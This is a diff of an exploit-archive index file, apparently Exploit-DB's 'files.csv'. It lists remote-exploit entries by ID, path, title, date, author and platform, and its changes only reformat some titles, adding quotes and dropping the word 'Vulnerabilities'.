Corruption",2004-12-18,"Arman Nayyeri",windows,remote,0 25032,platforms/windows/remote/25032.html,"Microsoft Windows Media Player 9.0 - ActiveX Control File Enumeration",2004-12-18,"Arman Nayyeri",windows,remote,0 25033,platforms/windows/remote/25033.txt,"GREED 0.81 - '.GRX' File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25034,platforms/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 -25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 -25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 +25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File 'getline' Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 +25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File 'get_holiday' Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25049,platforms/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0 25050,platforms/windows/remote/25050.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 @@ -13808,7 +13810,7 @@ id,file,description,date,author,platform,type,port 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0 25391,platforms/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 -25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 +25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database - Multiple SQL Injections",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25397,platforms/multiple/remote/25397.txt,"Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 @@ -13838,7 +13840,7 @@ id,file,description,date,author,platform,type,port 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 -25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 +25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0 @@ -13871,7 +13873,7 @@ id,file,description,date,author,platform,type,port 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,linux,remote,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0 -25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 +25835,platforms/windows/remote/25835.html,"Logic Print 2013 - vTable Overwrite Stack Overflow",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 @@ -13905,7 +13907,7 @@ id,file,description,date,author,platform,type,port 26332,platforms/multiple/remote/26332.txt,"Oracle 9 - XML DB Cross-Site Scripting",2005-10-07,"Alexander Kornbrust",multiple,remote,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0 26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 -26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 +26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure",2005-08-05,anonymous,linux,remote,0 40874,platforms/android/remote/40874.txt,"Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0 @@ -14088,7 +14090,7 @@ id,file,description,date,author,platform,type,port 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 -28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 +28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution",2013-09-15,blake,windows,remote,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 28314,platforms/linux/remote/28314.c,"BomberClone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 @@ -14180,7 +14182,7 @@ id,file,description,date,author,platform,type,port 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Remote Command Execution Multiple Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80 29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,linux,remote,0 -29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 +29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner",2013-10-31,noptrix,php,remote,0 29319,platforms/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 29321,platforms/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 @@ -14208,7 +14210,7 @@ id,file,description,date,author,platform,type,port 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30018,platforms/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 -30019,platforms/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 +30019,platforms/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution",2007-05-09,binagres,windows,remote,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 (Multiple Scripts) - Cross-Site Scripting Multiple Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 @@ -14276,11 +14278,11 @@ id,file,description,date,author,platform,type,port 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 -30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Persistent Cross-Site Scripting (Web UI)",2013-12-17,"David Um",windows,remote,0 +30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting",2013-12-17,"David Um",windows,remote,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,java,remote,0 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection (Metasploit)",2013-12-03,Metasploit,php,remote,80 -30011,platforms/windows/remote/30011.rb,"Microsoft - Tagged Image File Format (TIFF) Integer Overflow (Metasploit)",2013-12-03,Metasploit,windows,remote,0 +30011,platforms/windows/remote/30011.rb,"Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit)",2013-12-03,Metasploit,windows,remote,0 30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",windows,remote,0 30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 30074,platforms/linux/remote/30074.txt,"PHP PEAR 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",linux,remote,0 @@ -14296,7 +14298,7 @@ id,file,description,date,author,platform,type,port 30228,platforms/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",multiple,remote,0 -30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0 +30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0 30254,platforms/hardware/remote/30254.txt,"Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting",2007-06-27,"Petko Petkov",hardware,remote,0 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server - Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote,0 30257,platforms/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 @@ -14308,13 +14310,13 @@ id,file,description,date,author,platform,type,port 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 -30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 +30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30291,platforms/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 30292,platforms/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30315,platforms/windows/remote/30315.txt,"Trillian 3.1.6.0 - URI Handler Remote Code Execution",2007-07-16,"Nate Mcfeters",windows,remote,0 30319,platforms/linux/remote/30319.c,"tcpdump - Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 -30381,platforms/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 +30381,platforms/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection",2007-07-25,"Billy Rios",windows,remote,0 30469,platforms/linux/remote/30469.rb,"RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,linux,remote,443 31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 @@ -14447,7 +14449,7 @@ id,file,description,date,author,platform,type,port 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0 40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 -31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 +31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 @@ -14485,7 +14487,7 @@ id,file,description,date,author,platform,type,port 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 -31534,platforms/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 +31534,platforms/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite",2008-03-25,shinnai,windows,remote,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 31540,platforms/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow",2008-03-26,dannyp,linux,remote,0 31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure",2005-10-14,"security curmudgeon",multiple,remote,0 @@ -14496,11 +14498,11 @@ id,file,description,date,author,platform,type,port 31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal",2008-04-02,"Luigi Auriemma",linux,remote,0 31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote,0 31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote,0 -31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 +31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 -31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 +31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0 @@ -14622,7 +14624,7 @@ id,file,description,date,author,platform,type,port 32565,platforms/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 -32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 +32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass",2008-11-12,"Craig Heffner",hardware,remote,0 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0 32621,platforms/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,php,remote,80 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 @@ -14655,7 +14657,7 @@ id,file,description,date,author,platform,type,port 32794,platforms/php/remote/32794.rb,"Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Cross-Site Scripting Multiple Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 -32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 +32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 @@ -14855,8 +14857,8 @@ id,file,description,date,author,platform,type,port 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow",2010-03-25,"Luigi Auriemma",multiple,remote,0 33805,platforms/linux/remote/33805.pl,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center - fileRequestor Remote Code Execution (Metasploit)",2014-06-18,Metasploit,multiple,remote,8888 -33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 -33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server - Buffer Overflow (Metasploit)",2014-06-19,Metasploit,windows,remote,8080 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,windows,remote,0 @@ -14948,7 +14950,7 @@ id,file,description,date,author,platform,type,port 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)",2014-09-09,Metasploit,windows,remote,8020 34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow",2010-07-20,J23,linux,remote,0 34369,platforms/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 -34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 +34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection",2009-11-01,"Davide Canali",multiple,remote,0 34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 34385,platforms/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote,0 34390,platforms/php/remote/34390.rb,"HybridAuth - 'install.php' PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80 @@ -15090,7 +15092,7 @@ id,file,description,date,author,platform,type,port 35308,platforms/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - '.pcap' Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management - Authentication Bypass",2011-02-04,"Zack Fasel & Matthew Jakubowski",multiple,remote,0 -35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 +35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,hardware,remote,0 35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution",2011-02-07,d3c0der,windows,remote,0 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,php,remote,80 40431,platforms/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",hardware,remote,0 @@ -15255,7 +15257,7 @@ id,file,description,date,author,platform,type,port 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,php,remote,80 36455,platforms/multiple/remote/36455.txt,"Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 -36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 +36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Universal Exploit",2015-03-24,"Fady Mohammed Osman",windows,remote,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote,0 36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 @@ -15525,7 +15527,7 @@ id,file,description,date,author,platform,type,port 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 